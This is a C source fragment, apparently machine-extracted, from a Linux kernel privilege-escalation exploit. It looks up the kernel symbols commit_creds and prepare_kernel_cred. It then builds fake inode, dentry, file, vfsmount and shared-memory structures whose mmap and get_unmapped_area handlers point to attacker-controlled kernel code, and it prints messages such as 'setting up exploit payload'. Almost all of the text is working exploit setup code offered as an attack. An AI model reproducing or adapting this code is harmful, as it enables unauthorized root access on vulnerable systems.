
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_22__ TYPE_9__ ;
typedef struct TYPE_21__ TYPE_8__ ;
typedef struct TYPE_20__ TYPE_7__ ;
typedef struct TYPE_19__ TYPE_6__ ;
typedef struct TYPE_18__ TYPE_5__ ;
typedef struct TYPE_17__ TYPE_4__ ;
typedef struct TYPE_16__ TYPE_3__ ;
typedef struct TYPE_15__ TYPE_2__ ;
typedef struct TYPE_14__ TYPE_1__ ;
typedef struct TYPE_13__ TYPE_11__ ;
typedef struct TYPE_12__ TYPE_10__ ;


typedef scalar_t__ _prepare_kernel_cred ;
typedef scalar_t__ _commit_creds ;
struct TYPE_15__ {int count; } ;
struct TYPE_14__ {struct TYPE_14__* prev; struct TYPE_14__* next; } ;
struct TYPE_22__ {int i_size; TYPE_2__ inotify_mutex; TYPE_1__ inotify_watches; TYPE_6__* i_sb; } ;
struct TYPE_21__ {int * get_unmapped_area; int * mmap; } ;
struct TYPE_17__ {int mode; void* cgid; void* cuid; void* gid; void* uid; int key; } ;
struct TYPE_20__ {TYPE_10__* shm_file; TYPE_4__ shm_perm; } ;
struct TYPE_19__ {scalar_t__ s_flags; } ;
struct TYPE_18__ {int mnt_count; scalar_t__ mnt_flags; } ;
struct TYPE_16__ {struct TYPE_16__* next; struct TYPE_16__* prev; } ;
struct TYPE_13__ {int d_count; int d_flags; TYPE_9__* d_inode; int * d_parent; } ;
struct TYPE_12__ {TYPE_8__* f_op; TYPE_5__* f_vfsmnt; TYPE_11__* f_dentry; TYPE_3__ fu_list; } ;


 int IPC_PRIVATE ;
 scalar_t__ commit_creds ;
 TYPE_11__ dentry ;
 TYPE_10__ file ;
 scalar_t__ get_symbol (char*) ;
 void* getgid () ;
 void* getuid () ;
 TYPE_9__ inode ;
 int kernel_code ;
 TYPE_8__ op ;
 scalar_t__ prepare_kernel_cred ;
 int printf (char*) ;
 TYPE_7__ shmid_kernel ;
 TYPE_6__ super_block ;
 TYPE_5__ vfsmount ;

void
setup(void)
{
 printf("[+] looking for symbols...\n");

 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("[-] symbol table not availabe, aborting!\n");
 }

 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("[-] symbol table not availabe, aborting!\n");
 }

 printf("[+] setting up exploit payload...\n");

 super_block.s_flags = 0;

 inode.i_size = 4096;
 inode.i_sb = &super_block;
 inode.inotify_watches.next = &inode.inotify_watches;
 inode.inotify_watches.prev = &inode.inotify_watches;
 inode.inotify_mutex.count = 1;

 dentry.d_count = 4096;
 dentry.d_flags = 4096;
 dentry.d_parent = ((void*)0);
 dentry.d_inode = &inode;

 op.mmap = &kernel_code;
 op.get_unmapped_area = &kernel_code;

 vfsmount.mnt_flags = 0;
 vfsmount.mnt_count = 1;

 file.fu_list.prev = &file.fu_list;
 file.fu_list.next = &file.fu_list;
 file.f_dentry = &dentry;
 file.f_vfsmnt = &vfsmount;
 file.f_op = &op;

 shmid_kernel.shm_perm.key = IPC_PRIVATE;
 shmid_kernel.shm_perm.uid = getuid();
 shmid_kernel.shm_perm.gid = getgid();
 shmid_kernel.shm_perm.cuid = getuid();
 shmid_kernel.shm_perm.cgid = getgid();
 shmid_kernel.shm_perm.mode = -1;
 shmid_kernel.shm_file = &file;
}
